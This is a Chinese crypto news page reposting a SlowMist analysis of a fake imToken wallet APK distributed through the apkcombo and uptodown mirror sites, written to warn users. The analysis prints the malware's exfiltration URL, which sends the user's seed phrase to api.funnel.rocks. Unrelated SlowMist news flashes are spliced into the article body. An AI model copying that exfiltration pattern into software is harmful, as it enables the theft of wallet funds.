火星链 火星链
Ctrl+D收藏火星链
首页 > Pol币 > 正文

KEN:慢雾:Web3假钱包第三方源调查分析

作者:

时间:1900/1/1 0:00:00

原文作者:?山&耀

技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。

慢雾:JPEG'd攻击者或已将全部6106.75枚ETH归还给项目方:8月4日消息,慢雾MistTrack监测显示,JPEG'd攻击者或已将全部6106.75枚ETH归还给项目方。[2023/8/4 16:18:46]

俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?

据数据统计站点similarweb统计,apkcombo站点:

慢雾:Multichain(AnySwap)被黑由于anySwapOutUnderlyingWithPermit函数相关问题:据Multichain(AnySwap)早前消息,2022年01月18日,一个影响6个跨链Token的关键漏洞正在被利用。慢雾安全团队进行分析后表示,此次主要是由于anySwapOutUnderlyingWithPermit函数为检查用户传入的Token的合法性,且未考虑并非所有underlying代币都有实现permit函数,导致用户资产被未授权转出。慢雾安全团队建议:应对用户传入的参数是否符合预期进行检查,且在与其他合约进行对接时应考虑好兼容性问题。[2022/1/19 8:57:49]

全球排名:?1,?809?

国家排名:?7,?370?

慢雾:Badger DAO黑客已通过renBTC将约1125 BTC跨链转移到10 个BTC地址:12月2日消息,Badger DAO遭遇黑客攻击,用户资产在未经授权的情况下被转移。据慢雾MistTrack分析,截止目前黑客已将获利的加密货币换成 renBTC,并通过renBTC 将约 1125 BTC 跨链转移到 10 个 BTC 地址。慢雾 MistTrack 将持续监控被盗资金的转移。[2021/12/2 12:46:11]

品类排名:?168?

我们可以看到它的影响力和流量都非常大。

它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?

慢雾:警惕ETH新型假充值,已发现在野ETH假充值攻击:经慢雾安全团队监测,已发现存在ETH假充值对交易所攻击的在野利用,慢雾安全团队决定公开修复方案,请交易所或钱包及时排查ETH入账逻辑,必要时联系慢雾安全团队进行检测,防止资金丢失。建议如没有把握成功修复可先临时暂停来自合约地址的充值请求。再进行如下修复操作:1、针对合约ETH充值时,需要判断内联交易中是否有revert的交易,如果存在revert的交易,则拒绝入账。2、采用人工入账的方式处理合约入账,确认充值地址到账后才进行人工入账。同时需要注意,类以太坊的公链币种也可能存在类似的风险。[2020/5/23]

我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:

https://play.google.com/store/apps/details??id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。

而apkcombo镜像站的下载路径为:

https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11?,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3?,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown

下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助记词>

看下图,最早的“api.funnel.rocks”证书出现在2022-06-03?,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包App官方网址:

1?/imToken钱包:https://token.im/

2?/TokenPocket钱包:https://www.tokenpocket.pro/

3?/TronLink钱包:https://www.tronlink.org/

4?/比特派钱包:https://bitpie.com/

5?/MetaMask钱包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。

致谢:感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

标签:TOKTOKEWEBKENYan TokenFeta Tokenweb3.0币龙头itoken钱包官网代币

Pol币热门资讯
INJ:分析师为比特币价格制定更高目标,并预测INJ价格将上涨15%

故事亮点比特币价格反弹良好,目标是达到28,800美元的关键阻力位,以保持看涨势头。在市场参与者等待看涨推动的同时,牛市陷阱的可能性也浮出水面。在受到几天的看跌影响后,加密货币市场已经开始复苏.

1900/1/1 0:00:00
cardano:2023/04/26 数据库引擎升级优化公告

尊敬的唯客用户您好!为了提升服务质量,进一步优化您的交易体验,唯客预计于2023年04月26日05:30-06:00将进行数据库引擎升级之优化;优化升级范围如下:升级时间2023年04月26日0.

1900/1/1 0:00:00
USD:Beosin:zkSync生态DEX Merlin安全事件分析

原文来源:Beosin2023?年?4?月?26?日,据?Beosin-EagleEye?态势感知平台消息,MerlinDex?发生安全事件,USDC-WETH?流动性池的资金已全部被提取.

1900/1/1 0:00:00
ripple:XRP前景如何?值得投资吗?

瑞波币,又称XRP币,是由OpenCoin公司发行的虚拟货币,称作RippleCredits。瑞波币是当前市值排名第6的加密货币,是除了比特币、以太坊外受欢迎的虚拟币之一.

1900/1/1 0:00:00
VEN:跨链流动性协议 Catalyst 完成 420 万美元种子轮融资,Spartan Group 领投

ForesightNews消息,面向模块化区块链的跨链流动性协议Catalyst完成420万美元种子轮融资,SpartanGroup领投.

1900/1/1 0:00:00
TEC:ZT創新板即將上線BM

親愛的ZT用戶:ZT創新板即將上線BM,並開啟BM/USDT交易對。具體上線時間請關註平臺公告。BM項目簡介:BM,是一位千幣侯傾盡全力打造的一款元宇宙顛覆級應用.

1900/1/1 0:00:00